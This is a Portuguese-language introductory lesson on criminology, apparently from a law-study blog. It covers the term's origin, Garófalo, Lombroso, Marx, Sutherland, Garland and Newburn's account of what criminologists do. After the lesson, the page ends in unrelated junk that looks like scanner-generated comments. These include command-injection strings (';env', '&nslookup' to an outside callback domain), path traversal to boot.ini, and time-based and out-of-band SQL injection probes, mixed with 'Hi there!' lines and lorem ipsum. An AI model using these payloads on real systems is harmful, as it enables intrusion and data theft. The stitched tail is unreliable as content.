O Que é Criminologia: Conceito, Método, Objeto e Finalidades
O que é criminologia? A criminologia é um campo que envolve o estudo científico do crime, do comportamento criminoso e dos sistemas jurídicos. Os criminólogs são especialistas em tópicos como o comportamento desviante, o controle social e a reincidência.
Ela é uma ciência eminentemente aplicada, pois visa à compreensão, prevenção e regulação das condutas humanas consideradas criminosas.
O termo criminologia vem do latim, crimen (delito) e logos (tratado). Logo, pode-se dizer que estudamos o crime como um tratado. Em 1885, foi empregado pela primeira vez pelo italiano Rafael Garófalo, entretando Cesare Lombroso e Enrico Ferri já estudavam o tema (sem utilizar o termpo propriamente).
Existem várias razões convincentes pelas quais as pessoas deveriam estudar criminologia. É um assunto fascinante. É desafiador. É crítico. É complexo.
Acima de tudo, é real. Acontece no mundo real com pessoas reais. Portanto, o conhecimento e a compreensão obtidos com o estudo da criminologia podem ser testados e aplicados no mundo real. É um mundo de possibilidade sobre como definimos o crime, como explicamos o crime, como devemos responder ao crime e ao seu processo.
Karl Marx disse que um filósofo produz ideias, um poeta poesias, um clérigo sermões, um professor compêndios e por aí vai. Já um criminoso produz crimes.
Marx chamou atenção que pensamos o crime em termos morais, como algo a ser evitado ou proibido, mas também pode ser visto como uma espécia de produção.
Na verdade, a criminologia é um empreendimento político, que envolve escolhas. Só tem algo para estudar porque existem regras sociais, tais regras são ocasionalmente quebradas e alguns daqueles que as quebram são punidos. Mas não todos.
É verdade que a lei, normativamente, proibe todos de praticarem crimes: pobres ou ricos. Porém, raramente os mais ricos são efetivamente punidos. Às vezes, os danos e destruições dos ricos nem são chamados de crimes.
Portanto, precisamos pensar cuidadosamente sobre porque definimos certas ações e omissões como crimes e outras não, e sobre quem tem o poder de tomar essas decisões.
O fascinante da criminologia é a sua propensão por reflexões e questionamentos. Ao contrário do direito penal, que é mais normativo, e assume as coisas como dadas pelo poder legislativo.
Edwin Sutherland, escrevendo mais de três quartos de século atrás, observou que a criminologia é o corpo de conhecimento sobre o crime como um fenômeno social, incluindo em seu escopo o processo de fazer leis, de infringir leis e de reagir à violação de leis.
É um grande argumento do início ao fim. Os criminólogos estão toda hora questionando: por que a lei foi feita? O que ocorreu em seu processo? Quem infringiu a lei e por quê? Como o Estado e a sociedade reagem diante da violação dessas leis?
A criminologia tem suas origens no final do século 18 .Começou de modo desestruturado, em torno de pessoas que por algum motivo tinham que lidar com o crime e buscavam explicações, assim como você está buscando agora. Por exemplo, administradores de prisões e asilos, estatísticos, psiquiatras, etc. Era uma indústria caseira.
A criminologia ainda é melhor concebida como um assunto ou campo de estudo, ao invés de uma disciplina em si. De acordo com David Garland, a criminologia “não tem objeto teórico distinto e nenhum método único, próprio, de investigação”.
Ela se funda nas teorias e métodos de outras disciplinas. Assim, é melhor pensada como campo de estudo, eminentemente interdisciplinar, um lugar onde pessoas de diferentes perspectivas acadêmicas se reúnem.
Então, o que um criminólogo faz? Tim Newburn diz que quando perguntam o que ele faz, nunca tem certeza que tipo de resposta dar e o que o dizer “criminólogo” produzirá. Segundo Newburn, algumas pessoas criam expectativas na criminologia por causa do estado lamentável dos sistemas de justiça criminal e começam a se questionar sobre os porquês de trancar as pessoas e jogar a chave fora. Outros terão uma reação excitada, querendo saber como é capturar criminosos. Outros muito influenciados pela franquia CSI de programas de TV, perguntarão algo sobre as técnicas mais recentes de investigação e sobre assassinos em série.
Jurista do Futuro, esta foi a lição de hoje. Lembre-se de se inscrever no nosso canal do YouTube e até a próxima aula de criminologia.
Livro do Tim Newburn (Introdução à Criminologia) – https://amzn.to/3vFiJ89
Hi there!
;env
Hi there!
http://www.google.fr/?
../../../../../../../../../../boot.iniindex.php
Hi there!
Hi there!
Hi there!
sleep(11)#1
1 or pg_sleep(11)–1
1 and pg_sleep(11)–1
‘)) and (SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=1.1.1.1;DATABASE=w].a.p)
Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
localhost&nslookup r-18703-2026.bgle.0b.vc